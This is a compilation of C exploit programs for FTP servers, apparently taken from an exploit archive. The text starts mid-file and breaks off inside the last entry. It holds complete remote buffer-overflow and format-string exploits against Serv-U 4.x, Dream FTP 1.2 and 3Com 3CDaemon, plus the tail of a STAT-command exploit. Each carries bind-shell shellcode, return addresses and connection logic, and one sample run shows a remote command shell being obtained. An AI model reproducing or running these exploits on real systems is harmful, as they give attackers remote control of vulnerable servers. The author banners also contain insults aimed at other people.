0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3, 0x89,0x21,0xC8,0x21,0x0E,0xB4,
0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E, 0x55,0x06,0xED,0x1E,0xB4,0xCE,
0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55, 0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3, 0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC, 0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE, 0xDE,0x5D,0x19,0xE6,0x4D,0x75,
0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2, 0x55,0x9E,0xC2,0x55,0xDE,0x21,
0xAE,0xD6,0x21,0xC8,0x21,0x0E
};
char verbose=0;
static void start(void) __attribute__ ((constructor));
void start() {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1a,&gpa,4);
memcpy(bsh+0x2b,&lla,4);
}
int readcrap(int s) {
struct timeval tv;
fd_set fds;
int ret;
char buff[1024];
FD_ZERO(&fds);
FD_SET(s,&fds);
bzero(buff,sizeof(buff));
while (1) {
tv.tv_sec=1;
tv.tv_usec=0;
if ( ret=select(s+1, &fds, NULL, NULL, (struct timeval *)&tv) < 0 )
break;
if (FD_ISSET(s,&fds)) {
// something to read
if ( read(s,buff,sizeof(buff),0) < 1 )
break;
} else {
// timeout
return 1;
}
}
return 0; // something went bad
}
void usage(char *argv0) {
int i;
printf("%s -d <host/ip> [opts]\n\n",argv0);
printf("Options:\n");
printf(" -h undocumented\n");
printf(" -u user [default: " default_user "]\n");
printf(" -p pass [default: " default_pass "]\n");
printf(" -P <port> for the shellcode [default: 1180]\n");
exit(1);
}
void shell(int s) {
char buff[4096];
int retval;
fd_set fds;
printf("[+] connected!\n\n");
for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);
if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0);
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval);
}
}
}
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin;
struct hostent *he;
char *host; int port=default_port;
char *Host; int Port=1180; char bindopt=1;
int i,s;
char *buff, *jmpback="\xe9\x35\xff\xff\xff";
char *user=default_user; char *pass=default_pass;
printf(BANNER "\n");
if (argc==1)
usage(argv[0]);
for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);
switch(argv[i][1]) {
case 'd':
host=argv[i+1];
break;
case 'u':
user=argv[i+1];
break;
case 'p':
pass=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:1180;
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x46,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]);
default:
usage(argv[0]);
}
}
if (verbose)
printf("verbose!\n");
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");
sin.sin_family = 2;
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
printf("[.] will try to put a bindshell on port %d.\n",Port);
// -------------------- core
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] connect()");
printf("[+] connected, sending exploit\n");
buff=(char *)malloc(4096);
bzero(buff,4096);
readcrap(s);
sprintf(buff,"USER %s\r\n",user);
send(s,buff,strlen(buff),0);
readcrap(s);
sprintf(buff,"PASS %s\r\n",pass);
send(s,buff,strlen(buff),0);
readcrap(s);
bzero(buff,sizeof(buff));
strcpy(buff,"STAT ");
memset(buff+5,0x41,2000);
memcpy(buff+5+0x571-strlen(bsh),&bsh,strlen(bsh));
memcpy(buff+5+0x571,jmpback,strlen(jmpback));
i=offset;
memcpy(buff+5+0x5d9,&i,4);
send(s,buff,strlen(buff),0);
readcrap(s);
free(buff);
close(s);
// -------------------- end of core
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
exit(0);
}
// [2005-02-07]
21 Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\x ee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\x ea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x 8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x 8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x 50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\x fe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x 54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\x ff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\x e8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\x fe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x 42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\x ff\xff\x58\x6a"
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\x ff\xff\x31\xdb"
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x 53\x53\x31\xc0"
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x 53\x53\x6a\x44"
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x 53\x43\x53\x4b"
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\x e2\xfe\xff\xff"
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\x e8\xd1\xfe\xff"
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\x ff\xff\x31\xc0"
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\x ff";
int sock;
FILE* FILEsock;
int doubling;
void send_command(char *command, char *arguments) {
int i;
send(sock, command, strlen(command), 0);
send(sock, " ", 1, 0);
for (i=0; i<strlen(arguments); i++) {
send(sock, arguments+i, 1, 0);
if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
}
send(sock, "\x0a\x0d", 2, 0);
}
int main(int argc, char *argv[], char *envp[]) {
struct sockaddr_in addr;
char *outbuffer, inbuffer[256];
char *retaddress = NULL;
char *version = NULL;
if (argc<5) {
printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
exit(-1);
}
printf("- Serv-ME ----------------------------------------------------\n"
" Serv-U v4.x \"site chmod\" exploit.\n"
" Written by SkyLined <[email protected]>.\n"
" Credits for the vulnerability go to ICBM <[email protected]>.\n"
" Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("Socket creation failed");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
perror("Connection failed");
exit(-1);
}
FILEsock = fdopen(sock, "r");
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
printf("[-] This is not a Serv-U v4.X ftp server.\n");
exit(-1);
}
if (strstr(inbuffer, "v4.1") > 0) {
retaddress = retaddress_4103;
version = "4.1.0.3";
}
printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
send_command("USER", argv[3]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
send_command("PASS", argv[4]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "230") != inbuffer) {
printf("[-] Login failed.\n");
exit(-1);
}
if (argv[5]) {
printf("\n[+] Changing directory...\n");
send_command("CD", argv[5]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
}
outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
memset(outbuffer, NOP, exploit_length);
memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));
printf("\n[+] Checking if \\xff doubling is nescesary: ");
send_command("SITE CHMOD 477", "-\xff\xff-");
fgets(inbuffer, sizeof inbuffer, FILEsock);
if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
doubling = 1;
printf("Yes.");
retaddress = retaddress_4004;
version = "4.0.0.4";
} else {
printf("No.");
if (retaddress==NULL) {
retaddress = retaddress_4100;
version = "4.1.0.0";
}
}
printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
version, *(int*)retaddress);
memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));
printf("\n[+] Sending exploit... ");
send_command("SITE CHMOD 477", outbuffer);
printf("send, you can now try to connect to %s:28876.\n", argv[1]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
close(socket);
printf("\n[+] Done. \n");
}
// [2004-01-30]
21 Dream FTP 1.2 Remote Format String Exploit
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\x ee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\x ea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x 8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x 8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x 50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\x fe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x 54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\x ff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\x e8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\x fe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x 42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\x ff\xff\x58\x60"
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\x ff\xff\xff\x89"
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x 31\xdb\x56\x56"
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x 53\x53\x53\x53"
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x 50\x53\x53\x53"
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x 05\xd0\xe8\xdf"
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x 8d\x5f\xe8\xcf"
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\x c2\xfe\xff\xff"
"\x83\xc4\x5c\x61\xeb\x89";
int main(int argc, char *argv[], char *envp[]) {
int sock;
FILE* FILEsock;
struct sockaddr_in addr;
int port = 21;
char buffer[1024];
if (argc<2 || argc>3) {
printf("Usage: %s IP [PORT]\n", argv[0]);
exit(-1);
}
if (argc == 3) port = atoi(argv[2]);
printf("- Nightmare --------------------------------------------------\n"
" Dream FTP v1.2 formatstring exploit.\n"
" Written by SkyLined <[email protected]>.\n"
" Credits for the vulnerability go to badpack3t\n"
" <[email protected]>.\n"
" Shellcode based on work by H D Moore (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
(FILEsock = fdopen(sock, "r+")) == NULL) {
fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
perror(NULL);
exit(-1);
}
printf("\n[+] Connected to %s:%d.\n", argv[1], port);
do printf(" --> %s", fgets(buffer, sizeof buffer, FILEsock));
while (strstr(buffer, "220-") == buffer);
printf("\n[+] Sending exploit string...\n");
fprintf(FILEsock,
// Argument 10 points to the SEH handler code, it's RWE so we'll change
// the SEH handler to redirect execution to the beginning of our
// formatstring. When the SEH handler is called [ebx+0x3c] points
// to the start of our formatstring, we just have to jump over the
// formatstring exploit itself to our shellcode:
"\xeb\x29" // Jump over the formatstring exploit
"%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n" // Argument 10 -> SEH
"%%n" // Causes exception after SEH adjustment.
"@@@@@@@@" // nopslide landing zone for jump
"%s\r\n", // shellcode
0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
shellcode);
fflush(FILEsock);
close(sock);
printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
" connect to %s:28876.\n", argv[1]);
return 0;
}
// [2004-02-11]
21 3Com Ftp Server 2.0 Remote Overflow Exploit
/* Email fixed brotha /str0ke */
/*
3Com Ftp Server remote overflow exploit
author : c0d3r "kaveh razavi" [email protected]
package : 3CDaemon version 2.0 revision 10
advisory : http://secway.org/advisory/ad20041011.txt
company address : 3com.com
it is just a simple PoC tested on winxp sp 1 and may not work on other systems .
just a lame coded software that didnt cost to bother myself to develop
the exploit code . every command has got overflow .
compiled with visual c++ 6 : cl 3com.c
greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs
Jamie of exploitdev (hey man how should I thank u with ur helps?),
sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh
securiteam , roberto of zone-h , milw0rm (dont u see that my mail address has changed?)
Lamerz :
[email protected] with a ****ed ass ! , konkoor ( will be dead soon !! )
ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! )
/*
/*
D:\projects>3com.exe 127.0.0.1 21 c0d3r secret
-------- 3Com Ftp Server remote exploit by c0d3r --------
building overflow string
attacking host 127.0.0.1
packet size = 673 byte
connected
sending username
sending password
exploit sent successfully try nc 127.0.0.1 4444
D:\projects>nc 127.0.0.1 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3Com\3CDaemon>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
// 4 byte return address + 430 byte shellc0de
int main (int argc, char *argv[]){
char shellc0de[] = // some NOPS + shellcode bind port 4444
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x 4A\x33\xC9\x66"
"\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\x EB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x 12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\x ED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\x CE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\x C6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x 5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x 78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x 49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x 65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\x F3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x 59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x 6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\x F3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\x D9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\x C8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\x C8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\x AA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x 7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\x FA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\x EB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\x F8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\x EE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\x D8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\x FA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x 99";
unsigned char *recvbuf,*user,*pass;
unsigned int rc,addr,sock,rc2 ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
unsigned short port;
char *ptr;
long *addr_ptr;
int NOP_LEN = 200,i,x=0,f = 200;
if(argc < 5) {
printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n");
printf("-------- usage : 3com.exe host port user pass --------\n");
printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n");
exit(-1) ;
}
printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n");
recvbuf = malloc(256);
memset(recvbuf,0,256);
//Creating exploit code
printf(" building overflow string");
memset(buffer,0,size);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0;i < size;i+=4){
*(addr_ptr++) = address;
}
buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
for(i = 3;i != 235;i++){
buffer[i] = 0x90;
}
i = 239;
for(x = 0;x != strlen(shellc0de);x++,i++){
buffer[i] = shellc0de[x];
}
buffer[size] = 0;
//EO exploit code
user = malloc(256);
memset(user,0,256);
pass = malloc(256);
memset(pass,0,256);
sprintf(user,"user %s\r\n",argv[3]);
sprintf(pass,"pass %s\r\n",argv[4]);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf(" packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf(" connected\n") ;
rc2=recv(sock,recvbuf,256,0);
printf(" sending username\n");
send(sock,user,strlen(user),0);
send(sock,'\n',1,0);
printf(" sending password\n");
Sleep(1000);
send(sock,pass,strlen(pass),0);
send(sock,buffer,strlen(buffer),0);
send(sock,'\n',1,0);
printf(" exploit sent successfully try nc %s 4444\n" , argv[1]);
}
else {
printf("[-] 3CDaemon is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
// [2005-02-17]
21 3Com 3CDaemon FTP Unauthorized "USER" Remote BoF Exploit
/* Added " on line 86 /str0ke */
/*
3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow
The particularity of this exploit is to exploits a FTP server
without the need of any authorization.
Homepage: www.3com.com
version: 3CDaemon v2.0 rev10
Link: ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip
Application Risk: Severely High
Internet Risk: Low
Hole History:
14-4-2002: BOF flaw found by skyrim
15-4-2002: crash exploit done. securiteam.com/exploits/5NP050A75A.html
04-1-2005: Updated advisory by Sowhat securitytracker.com/id?1012768
17-2-2005: lame exploit released enigmagroup.org/id.php?id=825
18-2-2005: proper exploit released hat-squad.com, class101.org, class101.hat-squad.com
Notes:
-4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, badly interpreted by 3CDaemon
-Nice call ebx offset found.
Stable accross Win2k Pro&Srv, SP4's serie, every OS languages.
Greet:
Nima Majidi
Behrang Fouladi
Pejman
Hat-Squad.com
class101.org
class101.hat-squad.com
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
/*XORED*/
"\xEB\x26\x90\x00\x00\x00\x00\x00\x00\x02\x06\x6C\x 59\x6C\x59"
"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\x03\x58\x46\x 57\x53\x32"
"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8\xF9\x FF\xFF\xFF"
"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x 0C\x8B\x70"
"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x 8B\x5B\x78"
"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x 53\x51\x52"
"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x 34\x8B\x01"
"\xFE\xAC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x 45\x09\x8D"
"\x44\x45\x08\x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x 58\x5E\x56"
"\x50\x52\x2B\x4E\x10\x41\x0F\xB7\x0C\x4A\x8B\x04\x 88\x01\xF8"
"\x0F\xB6\x4D\x09\x89\x44\x8D\xD8\xFE\x4D\x09\x75\x BE\xFE\x4D"
"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x1A\x53\xFF\xD0\x 89\xC7\x6A"
"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\x82\x50\x 8B\x45\x04"
"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02\x 66\x35\x93"
"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x 53\x53\x56"
"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x 10\x55\x57"
"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\x FF\x55\xEC"
"\x8D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x 5C\x63\x6D"
"\x64\x94\x31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x 53\xFE\xCA"
"\x01\xF2\x52\x94\x8D\x45\x78\x50\x8D\x45\x88\x50\x B1\x08\x53"
"\x53\x6A\x10\xFE\xCE\x52\x53\x53\x53\x55\xFF\x55\x F0\x6A\xFF"
"\xFF\x55\xE4";
char scode2[]=
/*XORED*/
"\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x5E\x81\x73\x17\x 0E\xB4"
"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\x5C\xC9\x23\x0E\x B4\xCC\x76\x58"
"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F\xCB\x26\x76\x B5\x75\xA8\x44"
"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x14\x17\x85\x B5\x71\x12\xF1"
"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x2E\x0F\x 73\x74\xD1\x35"
"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\x85\x B8\xD4\xA8\x54"
"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE\x EB\xC1\x7E\x55"
"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\x B8\x14\x78\x12"
"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x 62\x16\xE4\x8F"
"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\x B4\x9F\x23\x9E"
"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\x FD\x19\x6A\xAA"
"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x 59\x63\x18\x59"
"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x 63\x16\xFC\x87"
"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x 4B\xCA\x27\x57"
"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x 84\xAE\xE3\x5E"
"\xE4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x 85\x44\x70\x5D"
